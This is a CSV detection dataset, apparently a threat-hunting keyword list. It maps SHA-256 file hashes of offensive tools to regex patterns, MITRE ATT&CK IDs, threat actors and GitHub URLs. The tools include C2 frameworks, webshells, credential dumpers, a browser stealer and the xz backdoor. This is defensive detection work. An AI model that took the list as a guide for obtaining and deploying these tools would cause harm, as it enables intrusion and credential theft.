"*0ef24b00e5bfbb3cbfbc6880f5ff42bbbdcc57c288c2e610d82a697da29cd074*",".{0,1000}0ef24b00e5bfbb3cbfbc6880f5ff42bbbdcc57c288c2e610d82a697da29cd074.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21744" "*0efa187631cbd593e757b52c3a2e8328857b1cd15a93724870d767f71964dd62*",".{0,1000}0efa187631cbd593e757b52c3a2e8328857b1cd15a93724870d767f71964dd62.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21745" "*0evilpwfilter*",".{0,1000}0evilpwfilter.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","21747" "*0evilpwfilter.dll*",".{0,1000}0evilpwfilter\.dll.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","21748" "*0evilpwfilter.dll*",".{0,1000}0evilpwfilter\.dll.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","21749" "*0f06194447698d2570c3ea97e506da0faf309a8e63b8e4e2b04bb99a1e3f0e6d*",".{0,1000}0f06194447698d2570c3ea97e506da0faf309a8e63b8e4e2b04bb99a1e3f0e6d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21751" "*0f0840b7da6f223c52f15ae1793c5a2942ce0d09ff493967b497a5d839eaaaa5*",".{0,1000}0f0840b7da6f223c52f15ae1793c5a2942ce0d09ff493967b497a5d839eaaaa5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21752" "*0f1e0f2ea2fd99d208b3bfafe79363c0b905303e12456c5473cd229882cf8fce*",".{0,1000}0f1e0f2ea2fd99d208b3bfafe79363c0b905303e12456c5473cd229882cf8fce.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21756" "*0f2d3c56a917f455906ba339ee8058b5f89138b8605b673eb669c1c6d0bebb5e*",".{0,1000}0f2d3c56a917f455906ba339ee8058b5f89138b8605b673eb669c1c6d0bebb5e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21758" "*0f3008f8210eb26ea38ca483f561707d720ae97972f63f9d1aa43b42d8beb6b9*",".{0,1000}0f3008f8210eb26ea38ca483f561707d720ae97972f63f9d1aa43b42d8beb6b9.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21759" "*0f340b471ef34c69f5413540acd3095c829ffc4df38764e703345eb5e5020301*",".{0,1000}0f340b471ef34c69f5413540acd3095c829ffc4df38764e703345eb5e5020301.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential 
Access","https://github.com/ihamburglar/fgdump","1","0","#filehash","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","21760" "*0f45809e1a640a7f54dd5211aff1b5239c310b0e81ddfb1244345ce6ec9d72e2*",".{0,1000}0f45809e1a640a7f54dd5211aff1b5239c310b0e81ddfb1244345ce6ec9d72e2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21763" "*0f556749b43ff623079348b6ad75ddbc03d011cf9d6b2e9d548f030259a1aef1*",".{0,1000}0f556749b43ff623079348b6ad75ddbc03d011cf9d6b2e9d548f030259a1aef1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21766" "*0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036*",".{0,1000}0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","#filehash","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","21767" "*0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036*",".{0,1000}0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - 
T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","21768" "*0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036*",".{0,1000}0f56c703e9b7ddeb90646927bac05a5c6d95308c8e13b88e5d4f4b572423e036.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","21769" "*0f5c81f14171b74fcc9777d302304d964e63ffc2d7b634ef023a7249d9b5d875*",".{0,1000}0f5c81f14171b74fcc9777d302304d964e63ffc2d7b634ef023a7249d9b5d875.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","21772" "*0f62d209e39c648d15f268c68056e5f309d5eb6c7b0eff890f5ccaf9a0e12b96*",".{0,1000}0f62d209e39c648d15f268c68056e5f309d5eb6c7b0eff890f5ccaf9a0e12b96.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21774" "*0f638c5cbc07c8c0f3f2343f5459af22e80e6a4abaeef14740454486903fcbb8*",".{0,1000}0f638c5cbc07c8c0f3f2343f5459af22e80e6a4abaeef14740454486903fcbb8.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","21775" "*0f699c5851b2727d8a1af5fd9c7507ac23e39bd072619866bd9e6774e6595efc*",".{0,1000}0f699c5851b2727d8a1af5fd9c7507ac23e39bd072619866bd9e6774e6595efc.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21776" "*0f6c95ac01cddb461aef1267d60ded9c723aaed9c64cb4507df5cd94e9a1782c*",".{0,1000}0f6c95ac01cddb461aef1267d60ded9c723aaed9c64cb4507df5cd94e9a1782c.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","21777" "*0f6cb2770be3533a4ab6b50f7d045c3c33cd2f61c37de652b638eef1217e3c41*",".{0,1000}0f6cb2770be3533a4ab6b50f7d045c3c33cd2f61c37de652b638eef1217e3c41.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21778" "*0f6e64bbfb810dd70627c534503ac49e468d77c31c033ff9de1640c3add5a99a*",".{0,1000}0f6e64bbfb810dd70627c534503ac49e468d77c31c033ff9de1640c3add5a99a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21779" "*0f7390905abc132889f7b9a6d5b42701173aafbff5b8f8882397af35d8c10965*",".{0,1000}0f7390905abc132889f7b9a6d5b42701173aafbff5b8f8882397af35d8c10965.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21780" "*0f7b6ddc0ef44701c4ab1284610d51d36b4e79d68fb0e184d122533d77cbfb63*",".{0,1000}0f7b6ddc0ef44701c4ab1284610d51d36b4e79d68fb0e184d122533d77cbfb63.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21782" "*0f84fb1ee028a12de7b7dfd282528b61ee8f248d8f4a6ea1ba8ea186dc0a06a0*",".{0,1000}0f84fb1ee028a12de7b7dfd282528b61ee8f248d8f4a6ea1ba8ea186dc0a06a0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21785" "*0f8665de91ca0ad348cf3443430e2bf576ae225e0e02b2a75aee505530a2d6f2*",".{0,1000}0f8665de91ca0ad348cf3443430e2bf576ae225e0e02b2a75aee505530a2d6f2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - 
T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21786" "*0f8802e2c560ffe447ecaf7e88b9a7a0ac526c8e13b382822f9b4eba16c744a2*",".{0,1000}0f8802e2c560ffe447ecaf7e88b9a7a0ac526c8e13b382822f9b4eba16c744a2.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","21787" "*0f898913633b4dad45a631e63466f6b76e591f896118bab6e718ab3c8587911f*",".{0,1000}0f898913633b4dad45a631e63466f6b76e591f896118bab6e718ab3c8587911f.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. 
A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","21788" "*0f8b3d08754df255a2d275a9b27c2f324e86f73cf7c679c577b1551b6dad590e*",".{0,1000}0f8b3d08754df255a2d275a9b27c2f324e86f73cf7c679c577b1551b6dad590e.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","21789" "*0f948584d230abb0e870a4e46541cdf4dd8b60f23fa7e031d27cd856bc49b4c4*",".{0,1000}0f948584d230abb0e870a4e46541cdf4dd8b60f23fa7e031d27cd856bc49b4c4.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21790" "*0f9529f2e838c7f27f80270aed795440b4545eacb713bfb64e5ba84df104bfa5*",".{0,1000}0f9529f2e838c7f27f80270aed795440b4545eacb713bfb64e5ba84df104bfa5.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","21791" "*0f99d2f2523047aa778e196a7f0bfd83580b3faa94299c52502d205957d23e5f*",".{0,1000}0f99d2f2523047aa778e196a7f0bfd83580b3faa94299c52502d205957d23e5f.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","21793" "*0fa2d98ba9b3da4ccc9fbc07e0e9f29aea12fe878ad83dd0c8c83564849433e4*",".{0,1000}0fa2d98ba9b3da4ccc9fbc07e0e9f29aea12fe878ad83dd0c8c83564849433e4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21795" "*0fa3195520e1b55fa7d36818a916b9b8cee1ee673997ec71c18a52947697d2fb*",".{0,1000}0fa3195520e1b55fa7d36818a916b9b8cee1ee673997ec71c18a52947697d2fb.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#filehash","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","21796" "*0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c*",".{0,1000}0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","#filehash","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","21797" "*0fa7194f72ad2e12774792f48c2cc01e4828356087210370acdd9c66b67f818b*",".{0,1000}0fa7194f72ad2e12774792f48c2cc01e4828356087210370acdd9c66b67f818b.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","21798" 
"*0fb342f94f359c9f54205a979854b7a3a3910bb7e118f0fc44cead28ebd81f0d*",".{0,1000}0fb342f94f359c9f54205a979854b7a3a3910bb7e118f0fc44cead28ebd81f0d.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","21800" "*0fc82ac081b6c592d5e6fe4ebd650721c7cd19e9810a26927874ff95d073baff*",".{0,1000}0fc82ac081b6c592d5e6fe4ebd650721c7cd19e9810a26927874ff95d073baff.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21804" "*0fc989cd644f58ef166d409d2f987bce4fa1544ca0e357d40095ce75ed444a7a*",".{0,1000}0fc989cd644f58ef166d409d2f987bce4fa1544ca0e357d40095ce75ed444a7a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21806" "*0fcb623d8d52c2357fb23ea4eb62a1553761faec062c084179e0211ec725a837*",".{0,1000}0fcb623d8d52c2357fb23ea4eb62a1553761faec062c084179e0211ec725a837.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","21807" "*0fcd95460e9acfbfe7e232d4e464591ebd66896310e61750eef609937ae2a146*",".{0,1000}0fcd95460e9acfbfe7e232d4e464591ebd66896310e61750eef609937ae2a146.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21808" "*0fcf4fd663a77b6782595c70df5f3a9910566a9820e4ca3342aeef99a6064b1a*",".{0,1000}0fcf4fd663a77b6782595c70df5f3a9910566a9820e4ca3342aeef99a6064b1a.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","21809" "*0fd11529bb961c342b925e156dbda40de75d4d9e823da6136ecb849b74b81e6a*",".{0,1000}0fd11529bb961c342b925e156dbda40de75d4d9e823da6136ecb849b74b81e6a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21811" 
